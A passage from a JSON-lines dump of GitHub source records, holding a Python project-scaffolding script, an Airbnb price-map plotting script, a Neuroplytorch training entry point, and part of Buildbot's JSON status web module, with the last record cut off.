\"\"\"\n main function\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n where = os.path.abspath(args.where)\n # global variables\n if args.script and args.package:\n raise ValueError('cannot create both a script and a package')\n if args.create:\n create_directory(where)\n if args.pyvenv:\n create_venv(where, args.pyversion)\n if args.git:\n create_git(where)\n if args.readme:\n create_readme(where, args.git)\n if args.script:\n init_script(where, args.pyversion, args.git)\n if args.license.lower() != 'none':\n create_license(where, args.license, args.git)\n if args.package:\n init_package(where, args)\n\n\n@arglogger\ndef create_directory(where):\n \"\"\"\n create the project directory at the indicated path\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n try:\n os.makedirs(where)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(where):\n logger.critical(\n 'script run with directory creation, but {0} already exists'\n ''.format(where))\n sys.exit(1)\n logger.info('created new project directory at {0}'.format(where))\n\n\n@arglogger\ndef create_license(where, license, git=False):\n \"\"\"\n add preferred LICENSE file\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n fn = 'LICENSE.txt'\n ld = LICENSES[license]\n try:\n src = ld['src']\n except KeyError:\n logger.warning('License data not found for \"{0}\". License creation '\n 'skipped.'.format(license))\n else:\n logger.debug('src: \"{0}\"'.format(src))\n logger.debug('src[0:2]: \"{0}\"'.format(src[0:2]))\n if src[0:2] == '::':\n logger.debug('src[2:]: \"{0}\"'.format(src[2:]))\n src = src[2:]\n url = (LICENSE_FIXES[src]['prefix'] + license +\n LICENSE_FIXES[src]['suffix'])\n else:\n url = src\n targets = [(url, os.path.join(where, fn))]\n fetch(targets, strip_yaml=True)\n if git:\n title = ld['title']\n git_it(where, fn, 'assigned the {0} using text from: {1}'\n ''.format(title, url))\n logger.info('instantiated and committed {0} using {1} from '\n '{2}'.format(fn, title, url))\n else:\n logger.info('instantiated {0} using {0} from {1}'.format(fn, title,\n url))\n\n\n@arglogger\ndef create_readme(where, git=False):\n \"\"\"\n create an initial readme file\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n src = TEMPLATES['readme']\n src = os.path.expanduser(src)\n src = os.path.abspath(src)\n dest_fn = os.path.basename(src)\n dest = os.path.join(where, dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n if git:\n git_it(os.path.dirname(dest), dest_fn,\n 'include default readme template')\n logger.info('instantiated {0} and committed it'.format(dest_fn))\n else:\n logger.info('instantiated {0}'.format(dest_fn))\n\n\n@arglogger\ndef create_venv(where, python_version):\n \"\"\"\n set up python virtual environment\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n v = '/usr/local/bin/python{0}'.format(python_version)\n venv_name = os.path.basename(where)\n env_dir = '~/Envs/{0}'.format(venv_name)\n if os.path.exists(env_dir):\n logger.critical(\n 'script run with venv creation, but {0} already exists'\n ''.format(env_dir))\n sys.exit(1)\n # somewhy following returns failure code 1 even when successful,\n # so can't try\n cmd = 'mkvirtualenv -v -p {0} {1} && deactivate'.format(v, env_dir)\n run(cmd, check=False) # mkvirtualenv returns non-zero code despite success\n logger.info('instantiated python {0} virtual environment at {1}'\n ''.format(python_version, env_dir))\n run('workon {} && pip install -U pip && deactivate'.format(venv_name))\n logger.info('upgraded pip to latest version')\n for dependency in DEFAULT_DEPENDENCIES:\n cmd = 'workon {} && pip install -U {} && deactivate'.format(\n venv_name, dependency)\n run(cmd)\n logger.info('installed dependency \"{}\"'.format(dependency))\n\n\n@arglogger\ndef create_git(where):\n \"\"\"\n create git repository\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n cmd = 'git init {0}'.format(where)\n run(cmd)\n logger.info('initialized git repository at {0}'.format(where))\n logger.debug('trying to set up .gitignore')\n fp = os.path.join(where, '.gitignore')\n shutil.copy(GITIGNORE_FILE, fp)\n git_it(where, '.gitignore', 'intial values for .gitignore')\n logger.info('instantiated .gitignore and committed it')\n\n\n@arglogger\ndef init_script(where, py_ver, git=False):\n \"\"\"\n include a python script template\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n src = TEMPLATES['script-{0}'.format(py_ver)]\n logger.debug('src: {0}'.format(src))\n src = os.path.expanduser(src)\n logger.debug('src: {0}'.format(src))\n src = os.path.abspath(src)\n logger.debug('src: {0}'.format(src))\n dest_fn = '{0}.py'.format(os.path.basename(where))\n dest = os.path.join(where, dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n if git:\n git_it(os.path.dirname(dest), dest_fn,\n 'include default script template')\n logger.info('added script template as {0}'.format(dest_fn))\n\n\n@arglogger\ndef init_package(where, args):\n \"\"\"\n set up as a python package\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n # create subordinate package folders\n for sub_dir in PACKAGE_SUBDIRECTORIES:\n os.makedirs(os.path.join(where, sub_dir))\n pkg_name = os.path.basename(where)\n pkg_name_parts = pkg_name.split('.')\n pkg_pile = os.path.join(where, *pkg_name_parts)\n os.makedirs(pkg_pile)\n\n # stub out additional files using internal templates\n templates = [\n (TEMPLATES['requirements'], []),\n (TEMPLATES['setup'], []),\n (TEMPLATES['setup_config'], []),\n (TEMPLATES['manifest'], []),\n (\n TEMPLATES['script-{}'.format(args.pyversion)],\n ['scripts']\n ),\n (\n TEMPLATES['package-{}'.format(args.pyversion)],\n pkg_name_parts\n ),\n (\n TEMPLATES['test_template{}'.format(args.pyversion)],\n ['tests']\n )\n ]\n for template in templates:\n logger.debug('template: {0}'.format(template[0]))\n src = os.path.expanduser(template[0])\n src = os.path.abspath(src)\n dest_fn = os.path.basename(src)\n dest = os.path.join(where, *template[1], dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n dest_fn = fixup_template(\n os.path.join(where, *template[1]), template[0], args)\n if args.git:\n git_it(os.path.dirname(dest), dest_fn,\n 'include default {0} template'.format(dest_fn))\n logger.info('instantiated {0} and committed it'.format(dest_fn))\n else:\n logger.info('instantiated {0}'.format(dest_fn))\n\n@arglogger\ndef fixup_template(where, template, args):\n \"\"\"\n rename template and substitute variables if necessary\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n fn = os.path.basename(template)\n logger.debug('running fixup_template on {0}'.format(fn))\n with open(os.path.join(where, fn), 'r') as f:\n t = f.read()\n logger.debug('setting up replacements for {0}'.format(fn))\n fkeys = [v[1] for v in Formatter().parse(t) if v[1] is not None]\n if len(fkeys) > 0:\n logger.debug('fkeys: {0}'.format(', '.join(fkeys)))\n replacements = {}\n missed = []\n for fk in fkeys:\n try:\n val = vars(args)[fk]\n except KeyError:\n missed.append(fk)\n else:\n replacements[fk] = val\n logger.debug('replacements: {0}'.format(', '.join(['[{0}]: \"{1}\"'.format(k, v)\n for k, v in replacements.items()])))\n if 'pkgreadme' in missed:\n replacements['pkgreadme'] = os.path.basename(TEMPLATES['readme'])\n if 'project_name' in missed:\n replacements['project_name'] = os.path.basename(where)\n if 'classlicense' in missed:\n replacements['classlicense'] = LICENSES[args.license]['classifier']\n logger.debug(\"missed: {0}\".format(', '.join(missed)))\n logger.debug('read replacements from args')\n logger.debug(replacements)\n logger.debug('attemping replacements in {0}'.format(fn))\n logger.debug(t)\n logger.debug(replacements)\n t = t.format(**replacements)\n logger.debug(t)\n shutil.copy2(os.path.join(where, fn),\n os.path.join(where, '{0}.bak'.format(fn)))\n with open(os.path.join(where, fn), 'w') as f:\n f.write(t)\n try:\n new_fn = TEMPLATE_RENAMES[fn]\n except KeyError:\n pass\n else:\n os.rename(os.path.join(where, fn), os.path.join(where, new_fn))\n return(new_fn)\n return(fn)\n\n\n@arglogger\ndef make_subdir(where, git, dname, init, children):\n \"\"\"\n create a subdirectory\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n target = os.path.join(where, dname)\n logger.debug('trying to make \"{0}\"'.format(target))\n try:\n os.makedirs(target)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(where):\n logger.critical(\n 'script run with directory creation, but {0} already exists'\n ''.format(target))\n sys.exit(1)\n if init:\n fn = '__init__.py'\n fp = os.path.join(target, fn)\n with open(fp, 'w'):\n pass\n if git:\n git_it(target, fn, 'make {0} part of the package by adding '\n '__init__.py'.format(target))\n logger.info('instantiated {0} and committed it'.format(fp))\n else:\n logger.info('instantiated {0}'.format(fp))\n for child in children:\n make_subdir(target, git, *child)\n\n\n@arglogger\ndef git_it(where, what, msg):\n \"\"\"\n add and commit something to the git repository\n \"\"\"\n cmd = 'git add {0} && git commit -m \"{1}\"'.format(what, msg)\n run(cmd, where)\n\n\n@arglogger\ndef run(cmd, where=None, check=True):\n \"\"\"\n use subprocess to execute a desired command in the shell\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n run_params = [\n 'bash',\n '-c',\n '. ~/.bash_profile'\n ]\n if where is not None:\n run_params[-1] += ' && cd {0}'.format(where)\n run_params[-1] += ' && {0}'.format(cmd)\n logger.debug('run_params: \\n {0}'.format('\\n '.join(run_params)))\n try:\n result = subprocess.run(\n run_params,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n check=check).stdout\n except subprocess.CalledProcessError as e:\n logger.critical('subprocess execution failed with status code '\n '{0}:\\n '.format(e.returncode) +\n 'command was: \"{0}\\n \"'.format(run_params))\n\n\ndef fetch(targets, strip_yaml=False):\n \"\"\"\n fetch file(s) from url(s), concatenate, and save locally\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n for target in targets:\n logger.debug('requesting {0}'.format(target[0]))\n r = requests.get(target[0], stream=True)\n if r.status_code == 200:\n # appending ensures we can aggregate, e.g., .gitignore content\n with open('{0}'.format(target[1]), 'ab') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n else:\n raise Exception('fetch of {0} failed with status code {1}'\n ''.format([0], r.status_code))\n sys.exit(1)\n logger.debug('successfully saved {0} as {1}'.format(*target))\n if strip_yaml:\n for target in targets:\n fp = target[1]\n post = frontmatter.load(fp)\n shutil.copy(fp, os.path.splitext(fp)[0] + '.bak')\n with open(fp, 'w') as f:\n f.write(post.content)\n logger.debug('removed yaml front matter from {0}'.format(fp))\n\n\nif __name__ == \"__main__\":\n log_level = DEFAULT_LOG_LEVEL\n log_level_name = logging.getLevelName(log_level)\n logging.basicConfig(level=log_level)\n\n try:\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n for p in POSITIONAL_ARGUMENTS:\n d = {\n 'help': p[3]\n }\n if type(p[2]) == bool:\n if p[2] is False:\n d['action'] = 'store_true'\n d['default'] = False\n else:\n d['action'] = 'store_false'\n d['default'] = True\n else:\n d['default'] = p[2]\n parser.add_argument(\n p[0],\n p[1],\n **d)\n parser.add_argument(\n 'where',\n type=str,\n help='path to desired project directory')\n args = parser.parse_args()\n if args.loglevel is not None:\n args_log_level = re.sub('\\s+', '', args.loglevel.strip().upper())\n try:\n log_level = getattr(logging, args_log_level)\n except AttributeError:\n logging.error(\n \"command line option to set log_level failed \"\n \"because '%s' is not a valid level name; using %s\"\n % (args_log_level, log_level_name))\n if args.veryverbose:\n log_level = logging.DEBUG\n elif args.verbose:\n log_level = logging.INFO\n elif args.quiet:\n log_level = logging.CRITICAL\n log_level_name = logging.getLevelName(log_level)\n logging.getLogger().setLevel(log_level)\n fn_this = inspect.stack()[0][1].strip()\n title_this = __doc__.strip()\n logging.info(': '.join((fn_this, title_this)))\n if log_level != DEFAULT_LOG_LEVEL:\n logging.warning(\n \"logging level changed to %s via command line option\"\n % log_level_name)\n else:\n logging.info(\"using default logging level: %s\" % log_level_name)\n logging.debug(\"command line: '%s'\" % ' '.join(sys.argv))\n try:\n main(args)\n except ValueError as e:\n logging.critical(e)\n sys.exit(1)\n except NotImplementedError as e:\n logging.critical(e)\n sys.exit(1)\n sys.exit(0)\n except KeyboardInterrupt as e: # Ctrl-C\n raise e\n except SystemExit as e: # sys.exit()\n raise e\n except Exception as e:\n print(\"ERROR, UNEXPECTED EXCEPTION\")\n print(str(e))\n traceback.print_exc()\n os._exit(1)\n","repo_name":"paregorios/make-project","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":19534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25137667145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 7 03:35:13 2018\n\nHeat map creator\n\n@Author: PouyaRZ\n\"\"\"\n\nimport numpy as np\nimport geopandas as gp\n#import geoplot\nimport pandas as pd\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\n\ngeojs = gp.read_file('../Data/neighbourhoods.geojson')\n\ndf = pd.read_csv('../Data/data_cleaned.csv')\ndf = df[['latitude','longitude','price']]\n\ndf['coords'] = list(zip(df.longitude, df.latitude))\ndf['coords'] = df['coords'].apply(Point)\ndf['price'] = np.exp(df['price'])\ndf = df[df['price']<=200]\n\n#df.drop('longitude','latitude')\n\n\ngdf = gp.GeoDataFrame(df, geometry='coords')\n\nbase = geojs.plot(color='white', edgecolor='black', linewidth = 1, figsize=(10,10))\n\ngdf.plot(ax=base, marker='o', column='price', markersize=1, legend=True)\n\nplt.xlabel('Longitude')\nplt.ylabel('Latitude')\nplt.title('NYC Airbnb Data Price Range')\n\nplt.savefig('Price_map.svg', bbox_inches='tight')","repo_name":"PouyaREZ/AirBnbPricePrediction","sub_path":"Main/Price_map_creator.py","file_name":"Price_map_creator.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"7198129777","text":"import torch\nimport torchvision\nimport pytorch_lightning as pl \nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nimport os \nimport argparse\nimport yaml \nimport pickle \n\n#.datasets import MNISTDataModule, EndToEndDataModule, EndToEndNoTestDataModule, ReasoningDataModule, fetch_perception_data\nfrom training import models, basic_models#BasicLSTM, MNISTModel, Neuroplytorch, ReasoningModel, MNISTWindow\nfrom data import data, datasets\n\ndef get_complex_parameters(complex_events_dict) -> tuple: \n ce_fsm_list, ce_time_list = [], [] \n for k in complex_events_dict.keys():\n complex_event = complex_events_dict[k]\n ce_fsm_list.append(torch.tensor(complex_event['PATTERN'])) \n max_time = [float('inf') if a=='INF' else a for a in complex_event['MAX_TIME']]\n ce_time_list.append(torch.tensor([max_time, complex_event['EVENTS_BETWEEN']]))\n \n return ce_fsm_list, ce_time_list\n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser() \n\n # This distinguishes between problems, i.e. the different scenarios, pattern parameters etc.\n parser.add_argument('--name', dest='config_name', type=str, default='basic_neuro_experiment')\n parser.add_argument('--logic', dest='check_logic', type=int, default=0) # if False, run end-to-end, if True run logic_check on reasoning layer\n\n args = vars(parser.parse_args())\n\n # TODO: on run, save the config file as hyperparameters for the logger\n with open(f'./configs/{args[\"config_name\"]}.yaml') as file:\n x = yaml.load(file, Loader=yaml.FullLoader)\n training = x['TRAINING'] \n complex_events = x['COMPLEX EVENTS']\n\n ce_fsm_list, ce_time_list = get_complex_parameters(complex_events)\n assert(data.check_complex_parameters(ce_fsm_list, ce_time_list), \"Pattern and temporal metadata don't match, check the config file\")\n\n MODULE_NAME = args['config_name']\n\n # TODO: redo and double check these, make sure **kwargs are going in the right places etc. \n perception_model_args = training['PERCEPTION']['PARAMETERS'].get('MODEL', {})\n reasoning_model_args = training['REASONING']['PARAMETERS'].get('MODEL', {})\n end_to_end_model_args = training['NEUROPLYTORCH']['PARAMETERS'].get('MODEL', {})\n\n perception_dataset_args = training['PERCEPTION']['PARAMETERS'].get('DATASET', {})\n reasoning_dataset_args = training['REASONING']['PARAMETERS'].get('DATASET', {})\n end_to_end_dataset_args = training['NEUROPLYTORCH']['PARAMETERS'].get('DATASET', {})\n\n perception_loss_str = training['PERCEPTION'].get('PRETRAIN', {}).get('LOSS_FUNCTION', 'MSELoss')\n reasoning_loss_str = training['REASONING'].get('LOSS_FUNCTION', 'MSELoss')\n\n pretrain_perception = training['PERCEPTION'].get('PRETRAIN', {}).get('PRETRAIN_PERCEPTION', False)\n pretrain_num_epochs = training['PERCEPTION'].get('PRETRAIN', {}).get('PRETRAIN_EPOCHS', 10)\n\n pretrain_lr = training['PERCEPTION'].get('PRETRAIN', {}).get('LEARNING_RATE', 0.001)\n reasoning_lr = training['REASONING'].get('LEARNING_RATE', 0.001)\n\n reasoning_epochs = training['REASONING']['EPOCHS']\n reasoning_num_data = training['REASONING']['EPOCHS']\n\n end_to_end_lr = training['NEUROPLYTORCH'].get('LEARNING_RATE', 0.001)\n end_to_end_loss_str = training['NEUROPLYTORCH'].get('LOSS_FUNCTION', 'MSELoss')\n end_to_end_epochs = training['NEUROPLYTORCH']['EPOCHS']\n \n no_test = end_to_end_dataset_args.get('no_test', True)\n\n window_size = training.get('WINDOW_SIZE', 10)\n num_primitive_events = training.get('NUM_PRIMITIVE_EVENTS', 10)\n input_size = perception_model_args.pop('input_size', None)\n\n use_gpu = int(torch.cuda.is_available())\n\n \n\n # fetch raw input data \n x = [] \n if training['DATASET']['TYPE']=='Pytorch Dataset':\n x = datasets.fetch_perception_data(dataset_str=training['DATASET']['NAME'], dataset_loc=training['DATASET']['LOCATION'])\n else:\n x = datasets.fetch_perception_data_local(dataset_loc=training['DATASET']['LOCATION'], dataset_type=training['DATASET']['TYPE'], **perception_dataset_args)\n\n\n\n\n # if pretrain_perception then train the perception model before attaching to Neuroplytorch, else leave untrained\n perception_model = basic_models.get_model(training['PERCEPTION']['MODEL'])(input_size=input_size, output_size=num_primitive_events, **perception_model_args)\n if input_size==None: perception_model = basic_models.get_model(training['PERCEPTION']['MODEL'])(output_size=num_primitive_events, **perception_model_args)\n if pretrain_perception:\n perception_data = datasets.get_datamodule(training['PERCEPTION']['PRETRAIN']['DATA_MODULE'])(data_dir=training['DATASET']['NAME'], **perception_dataset_args)\n model = models.get_model(training['PERCEPTION']['PRETRAIN']['MODEL_MODULE'])(loss_str=perception_loss_str, lr=pretrain_lr, **perception_model_args)\n trainer = pl.Trainer(max_epochs=pretrain_num_epochs, gpus=use_gpu, precision=16) \n trainer.fit(model, perception_data)\n\n perception_model = model.model\n\n perception_model = models.PerceptionWindow(perception_model=perception_model, window_size=window_size, num_primitive_events=num_primitive_events)\n\n\n\n\n # if a reasoning model already exists\n if os.path.exists(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt'):\n reasoning_model = models.ReasoningModel(input_size=num_primitive_events, output_size=len(ce_fsm_list), loss_str=reasoning_loss_str, lr=reasoning_lr)\n reasoning_model = reasoning_model.model\n reasoning_model.load_state_dict(torch.load(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt'))\n\n # otherwise synthesise data and train reasoning model separate from Neuroplytorch model\n else:\n reasoning_data = datasets.ReasoningDataModule(ce_fsm_list=ce_fsm_list, ce_time_list=ce_time_list, num_primitive_events=num_primitive_events, \n window_size=window_size, **reasoning_dataset_args)\n\n model = models.ReasoningModel(input_size=num_primitive_events, output_size=len(ce_fsm_list), loss_str=reasoning_loss_str, lr=reasoning_lr)\n trainer = pl.Trainer(max_epochs=reasoning_epochs, gpus=use_gpu, precision=16)\n\n trainer.fit(model, reasoning_data)\n trainer.test(model, reasoning_data)\n\n model.save_weights(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt')\n reasoning_model = model.model \n try: os.remove('curr_tmp_reasoning_model.pt')\n except Exception: pass \n\n\n\n\n if args['check_logic']:\n models.check_reasoning_logic(reasoning_model, ce_fsm_list, ce_time_list, num_primitive_events, window_size)\n\n else:\n\n # Push raw data with pattern parameters into an end-to-end dataset (NoTest implies the test set is used as validation)\n no_test_args = end_to_end_dataset_args.pop('no_test', True)\n end_data = datasets.EndToEndNoTestDataModule if no_test_args else datasets.EndToEndDataModule\n end_data = end_data(dataset=x, ce_fsm_list=ce_fsm_list, ce_time_list=ce_time_list, num_primitive_events=num_primitive_events, \n window_size=window_size, **end_to_end_dataset_args)\n\n # create a Neuroplytorch model from the reasoning model and perception model from previous and train\n end_model = models.Neuroplytorch(reasoning_model=reasoning_model, window_size=window_size, num_primitive_events=num_primitive_events,loss_str=end_to_end_loss_str, \n perception_model=perception_model, lr=end_to_end_lr)\n\n checkpoint_callback = ModelCheckpoint(\n monitor=\"val_loss\",\n dirpath=\"checkpoints\",\n filename=f\"{MODULE_NAME}\"+\"-{epoch:02d}-{val_loss:.2f}\",\n save_top_k=3,\n mode=\"min\",\n )\n\n trainer = pl.Trainer(max_epochs=end_to_end_epochs, gpus=use_gpu, precision=16)\n trainer.fit(end_model, end_data)\n\n end_model.save_model(f'models/neuroplytorch/{reasoning_loss_str}_{MODULE_NAME}')\n\n","repo_name":"dais-ita/Neuroplytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15457957791","text":"import collections\nimport datetime\nimport os\nimport re\n\nfrom twisted.internet import defer\nfrom twisted.web import html, resource, server\n\nfrom buildbot.status.web.base import HtmlResource\nfrom buildbot.util import json\n\n\n_IS_INT = re.compile('^[-+]?\\d+$')\n\n\nFLAGS = \"\"\"\\\n - as_text\n - By default, application/json is used. Setting as_text=1 change the type\n to text/plain and implicitly sets compact=0 and filter=1. Mainly useful to\n look at the result in a web browser.\n - compact\n - By default, the json data is compact and defaults to 1. For easier to read\n indented output, set compact=0.\n - select\n - By default, most children data is listed. You can do a random selection\n of data by using select= multiple times to coagulate data.\n \"select=\" includes the actual url otherwise it is skipped.\n - filter\n - Filters out null, false, and empty string, list and dict. This reduce the\n amount of useless data sent.\n - callback\n - Enable uses of JSONP as described in\n http://en.wikipedia.org/wiki/JSONP. Note that\n Access-Control-Allow-Origin:* is set in the HTTP response header so you\n can use this in compatible browsers.\n\"\"\"\n\nEXAMPLES = \"\"\"\\\n - /json\n - Root node, that *doesn't* mean all the data. Many things (like logs) must\n be explicitly queried for performance reasons.\n - /json/builders/\n - All builders.\n - /json/builders/\n - A specific builder as compact text.\n - /json/builders//builds\n - All *cached* builds.\n - /json/builders//builds/_all\n - All builds. Warning, reads all previous build data.\n - /json/builders//builds/\n - Where is either positive, a build number, or negative, a past\n build.\n - /json/builders//builds/-1/source_stamp/changes\n - Build changes\n - /json/builders//builds?select=-1&select=-2\n - Two last builds on '' builder.\n - /json/builders//builds?select=-1/source_stamp/changes&select=-2/source_stamp/changes\n - Changes of the two last builds on '' builder.\n - /json/builders//slaves\n - Slaves associated to this builder.\n - /json/builders/?select=&select=slaves\n - Builder information plus details information about its slaves. Neat eh?\n - /json/slaves/\n - A specific slave.\n - /json?select=slaves//&select=project&select=builders//builds/\n - A selection of random unrelated stuff as an random example. :)\n\"\"\"\n\n\ndef RequestArg(request, arg, default):\n return request.args.get(arg, [default])[0]\n\n\ndef RequestArgToBool(request, arg, default):\n value = RequestArg(request, arg, default)\n if value in (False, True):\n return value\n value = value.lower()\n if value in ('1', 'true'):\n return True\n if value in ('0', 'false'):\n return False\n # Ignore value.\n return default\n\n\ndef FilterOut(data):\n \"\"\"Returns a copy with None, False, \"\", [], () and {} removed.\n Warning: converts tuple to list.\"\"\"\n if isinstance(data, (list, tuple)):\n # Recurse in every items and filter them out.\n items = map(FilterOut, data)\n if not filter(lambda x: not x in ('', False, None, [], {}, ()), items):\n return None\n return items\n elif isinstance(data, dict):\n return dict(filter(lambda x: not x[1] in ('', False, None, [], {}, ()),\n [(k, FilterOut(v)) for (k, v) in data.iteritems()]))\n else:\n return data\n\n\nclass JsonResource(resource.Resource):\n \"\"\"Base class for json data.\"\"\"\n\n contentType = \"application/json\"\n cache_seconds = 60\n help = None\n pageTitle = None\n level = 0\n\n def __init__(self, status):\n \"\"\"Adds transparent lazy-child initialization.\"\"\"\n resource.Resource.__init__(self)\n # buildbot.status.builder.Status\n self.status = status\n\n def getChildWithDefault(self, path, request):\n \"\"\"Adds transparent support for url ending with /\"\"\"\n if path == \"\" and len(request.postpath) == 0:\n return self\n if (path == \"help\" or path == \"help/\") and self.help:\n pageTitle = ''\n if self.pageTitle:\n pageTitle = self.pageTitle + ' help'\n res = HelpResource(self.help, pageTitle=pageTitle, parent_node=self)\n res.level = self.level + 1\n return res\n # Equivalent to resource.Resource.getChildWithDefault()\n if self.children.has_key(path):\n return self.children[path]\n return self.getChild(path, request)\n\n def putChild(self, name, res):\n \"\"\"Adds the resource's level for help links generation.\"\"\"\n\n def RecurseFix(res, level):\n res.level = level + 1\n for c in res.children.itervalues():\n RecurseFix(c, res.level)\n\n RecurseFix(res, self.level)\n resource.Resource.putChild(self, name, res)\n\n def render_GET(self, request):\n \"\"\"Renders a HTTP GET at the http request level.\"\"\"\n d = defer.maybeDeferred(lambda : self.content(request))\n def handle(data):\n if isinstance(data, unicode):\n data = data.encode(\"utf-8\")\n request.setHeader(\"Access-Control-Allow-Origin\", \"*\")\n if RequestArgToBool(request, 'as_text', False):\n request.setHeader(\"content-type\", 'text/plain')\n else:\n request.setHeader(\"content-type\", self.contentType)\n request.setHeader(\"content-disposition\",\n \"attachment; filename=\\\"%s.json\\\"\" % request.path)\n # Make sure we get fresh pages.\n if self.cache_seconds:\n now = datetime.datetime.utcnow()\n expires = now + datetime.timedelta(seconds=self.cache_seconds)\n request.setHeader(\"Expires\",\n expires.strftime(\"%a, %d %b %Y %H:%M:%S GMT\"))\n request.setHeader(\"Pragma\", \"no-cache\")\n return data\n d.addCallback(handle)\n def ok(data):\n request.write(data)\n request.finish()\n def fail(f):\n request.processingFailed(f)\n return None # processingFailed will log this for us\n d.addCallbacks(ok, fail)\n return server.NOT_DONE_YET\n\n @defer.deferredGenerator\n def content(self, request):\n \"\"\"Renders the json dictionaries.\"\"\"\n # Supported flags.\n select = request.args.get('select')\n as_text = RequestArgToBool(request, 'as_text', False)\n filter_out = RequestArgToBool(request, 'filter', as_text)\n compact = RequestArgToBool(request, 'compact', not as_text)\n callback = request.args.get('callback')\n\n # Implement filtering at global level and every child.\n if select is not None:\n del request.args['select']\n # Do not render self.asDict()!\n data = {}\n # Remove superfluous /\n select = [s.strip('/') for s in select]\n select.sort(cmp=lambda x,y: cmp(x.count('/'), y.count('/')),\n reverse=True)\n for item in select:\n # Start back at root.\n node = data\n # Implementation similar to twisted.web.resource.getChildForRequest\n # but with a hacked up request.\n child = self\n prepath = request.prepath[:]\n postpath = request.postpath[:]\n request.postpath = filter(None, item.split('/'))\n while request.postpath and not child.isLeaf:\n pathElement = request.postpath.pop(0)\n node[pathElement] = {}\n node = node[pathElement]\n request.prepath.append(pathElement)\n child = child.getChildWithDefault(pathElement, request)\n\n # some asDict methods return a Deferred, so handle that\n # properly\n if hasattr(child, 'asDict'):\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n child.asDict(request)))\n yield wfd\n child_dict = wfd.getResult()\n else:\n child_dict = {\n 'error' : 'Not available',\n }\n node.update(child_dict)\n\n request.prepath = prepath\n request.postpath = postpath\n else:\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n self.asDict(request)))\n yield wfd\n data = wfd.getResult()\n\n if filter_out:\n data = FilterOut(data)\n if compact:\n data = json.dumps(data, sort_keys=True, separators=(',',':'))\n else:\n data = json.dumps(data, sort_keys=True, indent=2)\n if callback:\n # Only accept things that look like identifiers for now\n callback = callback[0]\n if re.match(r'^[a-zA-Z$][a-zA-Z$0-9.]*$', callback):\n data = '%s(%s);' % (callback, data)\n yield data\n\n @defer.deferredGenerator\n def asDict(self, request):\n \"\"\"Generates the json dictionary.\n\n By default, renders every childs.\"\"\"\n if self.children:\n data = {}\n for name in self.children:\n child = self.getChildWithDefault(name, request)\n if isinstance(child, JsonResource):\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n child.asDict(request)))\n yield wfd\n data[name] = wfd.getResult()\n # else silently pass over non-json resources.\n yield data\n else:\n raise NotImplementedError()\n\n\ndef ToHtml(text):\n \"\"\"Convert a string in a wiki-style format into HTML.\"\"\"\n indent = 0\n in_item = False\n output = []\n for line in text.splitlines(False):\n match = re.match(r'^( +)\\- (.*)$', line)\n if match:\n if indent < len(match.group(1)):\n output.append('
    ')\n indent = len(match.group(1))\n elif indent > len(match.group(1)):\n while indent > len(match.group(1)):\n output.append('
')\n indent -= 2\n if in_item:\n # Close previous item\n output.append('')\n output.append('
  • ')\n in_item = True\n line = match.group(2)\n elif indent:\n if line.startswith((' ' * indent) + ' '):\n # List continuation\n line = line.strip()\n else:\n # List is done\n if in_item:\n output.append('
  • ')\n in_item = False\n while indent > 0:\n output.append('')\n indent -= 2\n\n if line.startswith('/'):\n if not '?' in line:\n line_full = line + '?as_text=1'\n else:\n line_full = line + '&as_text=1'\n output.append('
    ' +\n html.escape(line) + '')\n else:\n output.append(html.escape(line).replace(' ', '  '))\n if not in_item:\n output.append('
